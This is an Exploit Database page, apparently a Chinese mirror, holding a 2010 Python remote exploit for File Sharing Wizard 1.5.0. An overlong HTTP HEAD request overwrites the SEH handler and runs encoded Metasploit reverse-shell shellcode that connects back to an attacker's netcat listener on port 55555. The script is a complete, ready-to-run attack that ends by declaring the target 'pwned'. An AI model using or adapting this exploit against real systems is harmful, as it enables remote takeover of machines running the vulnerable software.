File Sharing Wizard 1.5.0 – Remote Overflow (SEH)

• Exploit Database
• 114 阅读

• 作者： b0nd
  日期： 2010-06-17
• 类别：

  • remote
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/13903/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117

  #!/usr/bin/python     print "\n##########################################################" print "## Team Hackers Garage ##" print "## (www.garage4hackers.com) ##" print "## ##" print "## File Sharing Wizard Version 1.5.0 ##" print "## Remote Command Execution ##" print "## Author: b0nd ##" print "## (sumit.iips@gmail.com) ##" print "## ##" print "## Greetz to: The Hackers Garage Family ##" print "## Thanks to: www.exploit-db.com/author/m1k3/ ##" print "## ##" print "## & ##" print "## ##" print "## corelanc0d3r (CORELAN TEAM) ##" print "## ##" print "###########################################################"     # http://www.sharing-file.net/ # File Sharing Wizard Version 1.5.0 build on 26-8-2008   # Summary: The "HEAD" command leads to SEH overwrite and ultimately remote system compromise # Tested on: Windows XP SP2 # SEH Overwrite and shellcode pointed out by EBP # Huge space for shellcode.     import socket import sys   if len(sys.argv) < 2: print "Usage: exploit-code.py <Remote-IP-Address> <Remote-Port>" sys.exit(1)   ips = sys.argv[1] port = int(sys.argv[2])     string = "A"*1040 string += "\x90\x90\x1d\xeb" # nSEH --> Jump to Shellcode string += "\x29\xE3\xD3\x74" # pop pop ret from oledlg.dll (SafeSEH OFF) string += "\x90"*16 # Nop&apos;s   #win32_reverse -EXITFUNC=seh LHOST=192.168.96.1 LPORT=55555 Size=649 Encoder=PexAlphaNum http://metasploit.com */ #Thumb rule - Don&apos;t trust the shellcode ;) string += ("\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49" + "\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36" + "\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34" + "\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41" + "\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4c\x56\x4b\x4e" + "\x4d\x44\x4a\x4e\x49\x4f\x4f\x4f\x4f\x4f\x4f\x4f\x42\x36\x4b\x38" + "\x4e\x56\x46\x42\x46\x32\x4b\x48\x45\x44\x4e\x43\x4b\x38\x4e\x47" + "\x45\x30\x4a\x37\x41\x50\x4f\x4e\x4b\x38\x4f\x44\x4a\x31\x4b\x48" + "\x4f\x35\x42\x32\x41\x50\x4b\x4e\x49\x44\x4b\x38\x46\x53\x4b\x38" + "\x41\x30\x50\x4e\x41\x33\x42\x4c\x49\x59\x4e\x4a\x46\x38\x42\x4c" + "\x46\x57\x47\x30\x41\x4c\x4c\x4c\x4d\x50\x41\x50\x44\x4c\x4b\x4e" + "\x46\x4f\x4b\x53\x46\x45\x46\x42\x4a\x32\x45\x47\x45\x4e\x4b\x38" + "\x4f\x35\x46\x32\x41\x50\x4b\x4e\x48\x46\x4b\x58\x4e\x50\x4b\x34" + "\x4b\x58\x4f\x55\x4e\x41\x41\x30\x4b\x4e\x43\x30\x4e\x32\x4b\x48" + "\x49\x48\x4e\x56\x46\x42\x4e\x31\x41\x36\x43\x4c\x41\x53\x4b\x4d" + "\x46\x46\x4b\x58\x43\x54\x42\x53\x4b\x48\x42\x54\x4e\x50\x4b\x48" + "\x42\x47\x4e\x41\x4d\x4a\x4b\x38\x42\x54\x4a\x30\x50\x55\x4a\x36" + "\x50\x58\x50\x54\x50\x50\x4e\x4e\x42\x45\x4f\x4f\x48\x4d\x48\x36" + "\x43\x45\x48\x36\x4a\x36\x43\x43\x44\x53\x4a\x36\x47\x57\x43\x57" + "\x44\x53\x4f\x35\x46\x35\x4f\x4f\x42\x4d\x4a\x56\x4b\x4c\x4d\x4e" + "\x4e\x4f\x4b\x43\x42\x35\x4f\x4f\x48\x4d\x4f\x45\x49\x58\x45\x4e" + "\x48\x56\x41\x38\x4d\x4e\x4a\x30\x44\x30\x45\x55\x4c\x36\x44\x50" + "\x4f\x4f\x42\x4d\x4a\x56\x49\x4d\x49\x30\x45\x4f\x4d\x4a\x47\x55" + "\x4f\x4f\x48\x4d\x43\x55\x43\x55\x43\x55\x43\x55\x43\x44\x43\x55" + "\x43\x44\x43\x45\x4f\x4f\x42\x4d\x4a\x56\x42\x4c\x4a\x4a\x42\x56" + "\x41\x50\x48\x56\x4a\x36\x49\x4d\x43\x50\x48\x36\x43\x45\x49\x38" + "\x41\x4e\x45\x59\x4a\x46\x4e\x4e\x49\x4f\x4c\x4a\x42\x56\x47\x35" + "\x4f\x4f\x48\x4d\x4c\x56\x42\x41\x41\x55\x45\x35\x4f\x4f\x42\x4d" + "\x48\x56\x4c\x46\x46\x36\x48\x36\x4a\x46\x43\x36\x4d\x56\x4c\x46" + "\x42\x55\x49\x35\x49\x52\x4e\x4c\x49\x58\x47\x4e\x4c\x36\x46\x54" + "\x49\x58\x44\x4e\x41\x33\x42\x4c\x43\x4f\x4c\x4a\x45\x39\x49\x48" + "\x4d\x4f\x50\x4f\x44\x44\x4d\x42\x50\x4f\x44\x44\x4e\x52\x4d\x48" + "\x4c\x47\x4a\x33\x4b\x4a\x4b\x4a\x4b\x4a\x4a\x36\x44\x57\x50\x4f" + "\x43\x4b\x48\x41\x4f\x4f\x45\x57\x4a\x42\x4f\x4f\x48\x4d\x4b\x55" + "\x47\x45\x44\x35\x41\x55\x41\x55\x41\x35\x4c\x46\x41\x30\x41\x45" + "\x41\x35\x45\x35\x41\x55\x4f\x4f\x42\x4d\x4a\x56\x4d\x4a\x49\x4d" + "\x45\x50\x50\x4c\x43\x55\x4f\x4f\x48\x4d\x4c\x56\x4f\x4f\x4f\x4f" + "\x47\x53\x4f\x4f\x42\x4d\x4a\x56\x47\x4e\x49\x57\x48\x4c\x49\x47" + "\x4f\x4f\x45\x57\x46\x50\x4f\x4f\x48\x4d\x4f\x4f\x47\x47\x4e\x4f" + "\x4f\x4f\x42\x4d\x4a\x56\x42\x4f\x4c\x48\x46\x30\x4f\x35\x43\x45" + "\x4f\x4f\x48\x4d\x4f\x4f\x42\x4d\x5a");   string += "D"*4000 # Some more junk   print "Launching remote BoF on", ips print ""   s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) try: connect=s.connect((ips, port)) except: print "no connection possible" sys.exit(1)   print "\r\nsending payload" print "..."   payload = ( &apos;HEAD %s HTTP/1.0\r\n&apos; &apos;\r\n&apos;) % (string)     s.send(payload) s.close()   print "Check your netcat listening on TCP port 55555 for reverse connect shell\n" print "%s pwned!" % (ips)